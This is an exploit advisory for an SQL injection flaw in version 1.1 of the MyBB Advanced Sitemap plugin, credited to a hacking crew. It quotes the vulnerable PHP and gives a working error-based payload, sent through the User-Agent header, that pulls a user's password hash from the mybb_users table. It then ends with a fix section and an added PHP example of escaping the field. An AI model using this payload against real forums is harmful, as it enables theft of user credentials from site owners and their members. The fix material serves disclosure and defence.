MyBB Plugin Advanced Sitemap <= 1.1 SQL injection

# Exploit Title: MyBB Plugin Advanced Sitemap <= 1.1 SQL injection
# Date: 19/01/2013
# Exploit Author: Kallimero
# Vendor Homepage: http://mods.mybb.com/view/sitemap
# Version: 1.1
# Tested on: Debian



Vulnz
========

The MyBB plugin named Advanced Sitemap is vulnerable to SQL injection.



---------------[sitemap.php]---------------
<?php
$db->insert_query("sitemap_crawls",

                        array(
                                "useragent" => $_SERVER['HTTP_USER_AGENT'],
                                "remoteip" => getRemoteIP(),
                                "timestamp" => time()
                        )

                 );
?>
---------------[sitemap.php]---------------

Really simple: the User-Agent header goes into the query unescaped, so it lets us inject an SQL payload.
(modifyHeaders is a nice Firefox add-on which can be used to customize your headers, such as the User-Agent.)

Here is the PoC (error-based):
user_agent=',(select 1 from (select count(*),concat((SELECT password FROM mybb_users LIMIT 0,1),0x7e, floor(rand(0)*3)) as e from information_schema.tables group by e) a))-- -
Then go to http://[site]/sitemap.php



How to Fix ?
============


A simple $db->escape_string() on the vulnerable fields would fix it.
Never trust http headers...
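
The fix described above, written out as an added example (not the plugin's or MyBB's own code). `StubDb` and `log_crawl` are hypothetical names used so the script runs offline, and validating the address with `filter_var` assumes `getRemoteIP()` may take its value from request headers.

```php
<?php
// Added example, not the plugin's code. StubDb is a hypothetical stand-in for
// MyBB's $db so the script runs offline.
class StubDb
{
    // Stand-in only: the real $db->escape_string() uses the database driver's escaper.
    public function escape_string($value)
    {
        return addslashes($value);
    }

    // Wraps every value in single quotes without escaping it, which is the
    // behaviour the advisory relies on.
    public function insert_query($table, array $row)
    {
        $cols = implode('`,`', array_keys($row));
        $vals = implode("','", $row);
        return "INSERT INTO {$table} (`{$cols}`) VALUES ('{$vals}')";
    }
}

// Hardened version of the sitemap.php call (function name is hypothetical).
function log_crawl($db, $userAgent, $remoteIp)
{
    // Store the address only if it parses as IPv4/IPv6, since it may be derived
    // from request headers; otherwise store an empty string.
    $ip = filter_var($remoteIp, FILTER_VALIDATE_IP) ? $remoteIp : '';

    return $db->insert_query("sitemap_crawls", array(
        "useragent" => $db->escape_string((string) $userAgent),
        "remoteip"  => $db->escape_string($ip),
        "timestamp" => (int) time(),
    ));
}

$db = new StubDb();
$ua = "Mozilla/5.0 ' constructed-quote-test"; // constructed input, not a payload

// Before: the quote ends the string literal early and the rest is parsed as SQL.
echo $db->insert_query("sitemap_crawls", array("useragent" => $ua)), "\n";

// After: the quote is escaped and stays inside the literal.
echo log_crawl($db, $ua, "203.0.113.7"), "\n";
```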

Thanks
=========

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit : http://hwc-crew.org/

Groucho

